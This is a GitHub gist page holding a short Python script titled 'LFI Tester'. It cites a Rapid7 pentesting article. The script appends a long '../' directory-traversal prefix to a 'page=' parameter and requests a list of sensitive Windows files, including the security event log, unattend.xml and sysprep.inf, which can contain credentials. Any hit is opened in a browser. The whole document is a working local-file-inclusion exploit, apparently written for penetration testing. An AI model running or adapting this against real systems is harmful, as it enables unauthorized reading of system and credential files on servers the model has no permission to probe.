Skip to content

Instantly share code, notes, and snippets.

@kkirsche

kkirsche/lfi-tester.py

Last active Oct 20, 2018
Embed
What would you like to do?
LFI Tester
import requests
import webbrowser
# formatted using Black
# https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/
url = "http://www.testpage.com?page="
LFI = "../../../../../../../../../"
pages = [
"boot.ini",
"WINDOWS/system32/drivers/etc/hosts",
"WINDOWS/system32/win.ini",
"WINDOWS/system32/debug/NetSetup.log",
"WINDOWS/system32/config/AppEvent.Evt",
"WINDOWS/system32/config/SecEvent.Evt",
"WINDOWS/Panther/unattend.txt",
"WINDOWS/Panther/unattend.xml",
"WINDOWS/Panther/unattended.xml",
"WINDOWS/Panther/sysprep.inf",
]
for x in pages:
check = requests.get(url + LFI + x)
if check.status_code == 200:
webbrowser.open(url + LFI + x)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment